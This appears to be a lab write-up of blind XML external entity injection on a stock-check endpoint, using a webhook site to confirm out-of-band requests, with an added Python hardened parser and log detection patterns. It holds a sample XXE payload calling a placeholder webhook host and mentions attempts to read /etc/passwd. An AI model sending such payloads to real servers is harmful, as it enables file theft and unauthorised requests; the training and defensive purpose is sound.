Path: /catalog/product/stock
Difficulties: JavaScript event handlers, JavaScript modifies request, JavaScript client-side rendering
Technologies: JavaScript
Vulnerabilities: XML external entity injection

This task calls for Burp Collaborator, which is only available in Burp Suite Professional.

Vulnerability 1: XML external entity injection

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

Manual testing for this

I have a page with functionality to check the stock.

One product that allows us to check the stock is shown below:

Start Burp's Intercept and then check the stock.

I got this XML code. I will modify the payload according to it.

Since I don't have a public-facing IP address, I will use a site called Webhook. This site will capture any requests made to it by the target website, allowing me to confirm the presence of an XXE vulnerability.

To begin, I will first visit the Webhook site and generate a unique URL.

Copy the Unique URL and then Open it in a new tab.

Payload for XXE:

I kept everything else as it is and only added the Webhook site URL with the unique ID.

The request was sent, and we received an error message stating, "Product ID must be a number." Despite this error, a request was successfully made to our payload site, and it was captured. You can see that the request has been logged on the Webhook site.
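The observation above (a "Product ID must be a number" error while the out-of-band request still arrived) shows that the external entity is resolved while the parser reads the document, before the application ever validates the product ID. The following Python example is added here and is not part of the original write-up or the lab's code: it is a hardened server-side parser for a stock-check request of the shape used in this write-up, built on the standard-library expat bindings, plus a small detection helper for request logs. The element names `productId` and `storeId`, the request bodies, and the `webhook.example` placeholder URL are constructed for the example.

```python
import re
import xml.parsers.expat
from dataclasses import dataclass


@dataclass
class StockRequest:
    product_id: int
    store_id: int


class UnsafeXml(ValueError):
    """Raised as soon as a DOCTYPE or external entity is seen, before resolution."""


def parse_stock_request(body: bytes) -> StockRequest:
    """Parse <stockCheck><productId/><storeId/></stockCheck>, refusing any DTD.

    Rejection happens inside the parser callbacks, i.e. at the same moment a
    vulnerable parser would be fetching the attacker's URL, so nothing is
    resolved before validation of the field values.
    """
    parser = xml.parsers.expat.ParserCreate()
    fields: dict[str, str] = {}
    text: list[str] = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # A stock check never legitimately carries a DOCTYPE, so refuse the
        # whole document before any <!ENTITY> declaration is processed.
        raise UnsafeXml(f"DOCTYPE {name!r} is not allowed in a stock request")

    def external_entity(context, base, system_id, public_id):
        # Defence in depth: even if a DTD were ever allowed, never fetch
        # SYSTEM identifiers (files or URLs) on the caller's behalf.
        raise UnsafeXml(f"refusing to resolve external entity {system_id!r}")

    def start_element(name, attrs):
        text.clear()

    def char_data(data):
        text.append(data)

    def end_element(name):
        if name in ("productId", "storeId"):
            fields[name] = "".join(text).strip()

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(body, True)  # exceptions raised in handlers propagate here

    # Only now, with no entities resolved, validate the field values.
    try:
        product_id = int(fields.get("productId", ""))
    except ValueError:
        raise ValueError("Product ID must be a number") from None
    try:
        store_id = int(fields.get("storeId", ""))
    except ValueError:
        raise ValueError("Store ID must be a number") from None
    return StockRequest(product_id, store_id)


def is_rejected_as_unsafe(body: bytes) -> bool:
    """True if the parser refused the body because of a DTD or external entity."""
    try:
        parse_stock_request(body)
    except UnsafeXml:
        return True
    return False


# Log-side detection: indicators worth alerting on in captured request bodies.
XXE_INDICATORS = [
    (re.compile(rb"<!DOCTYPE", re.I), "DOCTYPE declaration"),
    (re.compile(rb"<!ENTITY", re.I), "ENTITY declaration"),
    (re.compile(rb"\bSYSTEM\s+[\"']", re.I), "SYSTEM identifier"),
]


def xxe_indicators(body: bytes) -> list[str]:
    """Return the names of XXE indicators present in a request body."""
    return [label for rx, label in XXE_INDICATORS if rx.search(body)]


# Constructed sample bodies (not captured from the lab).
BENIGN_BODY = (b'<?xml version="1.0" encoding="UTF-8"?>'
               b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>")
XXE_BODY = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://webhook.example/PLACEHOLDER-ID"> ]>'
            b"<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>")

if __name__ == "__main__":
    print(parse_stock_request(BENIGN_BODY))
    print("rejected:", is_rejected_as_unsafe(XXE_BODY), xxe_indicators(XXE_BODY))
```

The detection helper is intentionally coarse: a legitimate stock-check client never sends a DOCTYPE, so any of the three indicators in this endpoint's request log is a strong signal, regardless of whether the application later answered with a validation error.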

On the PortSwigger site, we can see a payload for XXE that retrieves the "/etc/passwd" file.

I tried fetching files, first assuming the underlying system was Linux, and then assuming it was Windows. However, both attempts failed.
